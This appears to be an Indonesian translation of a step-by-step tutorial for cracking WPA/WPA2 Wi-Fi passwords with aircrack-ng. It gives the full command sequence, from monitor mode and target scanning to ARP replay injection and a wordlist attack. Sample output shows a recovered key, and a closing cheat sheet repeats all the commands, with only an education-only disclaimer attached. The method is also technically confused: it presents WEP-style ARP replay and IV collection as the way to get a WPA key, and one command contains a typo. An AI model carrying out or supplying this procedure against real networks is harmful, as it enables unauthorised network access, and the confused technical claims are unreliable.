Aircrack-ng pada dasarnya adalah rangkaian perangkat lunak jaringan yang dibuat untuk mencapai tujuan berikut:
Perhatikan bahwa tutorial ini bukanlah panduan lengkap, melainkan dimaksudkan untuk membangun beberapa keterampilan dasar untuk menguji keamanan jaringan Anda dan memahami konsepnya.
Serangan yang diuraikan di bawah ini didasarkan pada teknik pasif (serangan replay permintaan ARP) dan berfokus pada distribusi berbasis debian dengan asumsi Anda memiliki kartu nirkabel yang berfungsi dengan driver yang sudah ditambal untuk injeksi.
Aircrack-ng dapat diinstal pada sistem operasi berbasis debian dengan mengkompilasi source code-nya (untuk lebih jelasnya dapat mengunjungi situs resminya).
Di bawah ini Anda dapat menemukan instruksi untuk menginstal persyaratan dasar untuk membangun aircrack-ng untuk sistem operasi berbasis Debian.
$ sudo apt install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev hostapd wpasupplicant tcpdump screen iw usbutils
Dapatkan salinan terbaru dari aircrack-ng:
$ git clone https://github.com/aircrack-ng/aircrack-ng
$ cd aircrack-ng
Untuk membangun aircrack-ng, sistem build Autotools digunakan. Pertama, ./configure
proyek yang akan dibangun dengan opsi yang sesuai:
$ autoreconf -i
$ ./configure --with-experimental
Selanjutnya, kompilasi proyek dengan perintah make
dan gunakan target "instalasi" dari target tambahan yang tercantum di bawah ini untuk menyelesaikan instalasi.
make check
make integration
make install
make uninstall
Tujuan dari langkah ini memastikan bahwa kartu Anda berhasil mendukung injeksi. Dengan asumsi nama antarmuka Anda adalah "wlan0" (Anda dapat mengambilnya dengan mengetik iwconfig
di terminal), ketikkan perintah berikut:
# aireplay-ng --test wlan0
Sistem merespons:
18:10:59 wlan0 channel: 10
18:10:59 Trying broadcast probe requests...
18:10:59 Injection is working!
18:11:00 Found 1 AP
...
Ini mengonfirmasi bahwa kartu Anda dapat menyuntikkan paket.
Hal pertama yang harus dilakukan adalah mencari target potensial yang menempatkan kartu nirkabel Anda ke mode monitor menggunakan airmon-ng
. Namun, sangat disarankan untuk kill
semua proses yang mengganggu sebelum menggunakan rangkaian aircrack-ng.
# airmon-ng check kill
Killing these processes:
PID Name
870 dhclient
1115 wpa_supplicant
Kemudian, dimungkinkan untuk mengaktifkan mode monitor yang digunakan untuk membuat antarmuka lain (mon0):
# airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros AR9485
(monitor mode enabled for [phy0]wlan0 on [phy0]mon0)
Anda akan melihat bahwa "wlan0" telah berhasil dimasukkan ke mode monitor. Kemudian, mulai airodump-ng
untuk mencari jaringan:
# airodump-ng mon0
Temukan jaringan nirkabel yang ingin Anda retas, dan catat BSSID dan salurannya dari output berikut:
CH 10 ][ Elapsed: 36 s][2019-05-15 18:15
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:00:BF:E6:31:2E -21 100 5240 178307 338 10 54 WPA CCMP PSK infosec_router
...
Perhatikan bahwa bagian atas keluaran mencantumkan informasi tentang Titik Akses dalam jangkauan, dan bagian bawah mencantumkan klien yang terhubung ke Titik Akses yang sesuai.
Buka sesi konsol lain untuk menangkap vektor awal yang dihasilkan oleh target dan menyimpan hasilnya ke dalam file:
# airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0
di mana -c 10
adalah saluran untuk jaringan nirkabel, --bssid 08:00:BF:E6:31:2E
adalah alamat MAC AP, -w output-file
mendefinisikan file output yang akan berisi vektor inisialisasi, dan mon0
adalah nama antarmuka.
Sistem merespons:
CH 10 ][ Elapsed: 12 s][2019-05-15 18:16
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:00:BF:E6:31:2E -21 100 5240 178307 338 10 54 WPA CCMP PSK infosec_router
BSSID STATION PWR Lost Packets Probes
08:00:BF:E6:31:2E 00:0F:35:51:AC:22 -21 0 183782
Setelah eksekusi perintah, berbagai file akan dihasilkan.
Serangan replay permintaan ARP klasik adalah cara paling efektif untuk menghasilkan vektor inisialisasi baru, dan bekerja dengan sangat andal. Tujuan dari langkah ini adalah untuk memulai aireplay-ng
dalam mode yang mendengarkan permintaan ARP kemudian menyuntikkannya kembali ke titik akses. Biarkan airodump-ng
dan aireplay-ng
Anda tetap berjalan, buka terminal lain dan jalankan serangan replay permintaan ARP:
# aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 618643 packets (got 304896 ARP requests), sent 194947 packets...
Anda dapat memeriksa apakah paket telah disuntikkan dengan melihat layar airodump-ng
.
Pada titik ini, Anda seharusnya sudah bisa mendapatkan kunci WPA dari vektor inisialisasi yang dikumpulkan pada langkah sebelumnya. Untuk melakukan serangan ini Anda memerlukan daftar kata dan jika kata sandi jaringan tidak ada dalam file kata Anda tidak akan memecahkan kata sandinya. Perhatikan bahwa sebagian besar router WPA/WPA2 dilengkapi dengan kata sandi acak 12 karakter yang kuat yang (memang) tidak diubah oleh banyak pengguna. Jika Anda mencoba memecahkan salah satu kata sandi ini, saya sarankan menggunakan daftar kata sandi sepanjang WPA.
Buka sesi konsol lain dan ketik:
# aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output * .cap
di mana -a2
menentukan mode serangan untuk WPA/WPA2-PSK, -w wordlist.txt
mengacu pada daftar kata kamus Anda sendiri, dan output*.cap
memilih semua file output dengan ekstensi .cap
.
Ini adalah hasil dari serangan yang berhasil:
Aircrack-ng 1.5.2
[00:00:00] 192/1229 keys tested (520.04 k/s)
Time left: 0 seconds 15.62%
KEY FOUND! [ notsecure ]
Master Key : 42 28 5E 5A 73 33 90 E9 34 CC A6 C3 B1 CE 97 CA
06 10 96 05 CC 13 FC 53 B0 61 5C 19 45 9A CE 63
Transient Key : 86 D0 43 C9 AA 47 F8 03 2F 71 3F 53 D6 65 F3 F3
86 36 52 0F 48 1E 57 4A 10 F8 B6 A0 78 30 22 1E
4E 77 F0 5E 1F FC 73 69 CA 35 5B 54 4D B0 EC 1A
90 FE D0 B9 33 06 60 F9 33 4B CF 30 B4 A8 AE 3A
EAPOL HMAC : 8E 52 1B 51 E8 F2 7E ED 95 F4 CF D2 C6 D0 F0 68
Di bawah ini Anda dapat menemukan daftar semua perintah yang diperlukan untuk memecahkan jaringan WPA/WPA2.
# kill all interfering processes prior to using the aircrack-ng
airmon-ng check kill
# put your network device into monitor mode
airmon-ng start wlan0
# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0
# start listening for the handshake on a new console session
airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0
# start the ARP request replay attack
aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0
# run aircrack-ng to obtain the WPA key
aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output*.cap
Proyek ini dilisensikan di bawah Lisensi MIT - lihat file LISENSI untuk detailnya.
Tutorial ini dibuat untuk tujuan pendidikan saja, saya tidak mempromosikan praktik jahat dan saya tidak akan bertanggung jawab atas aktivitas ilegal apa pun.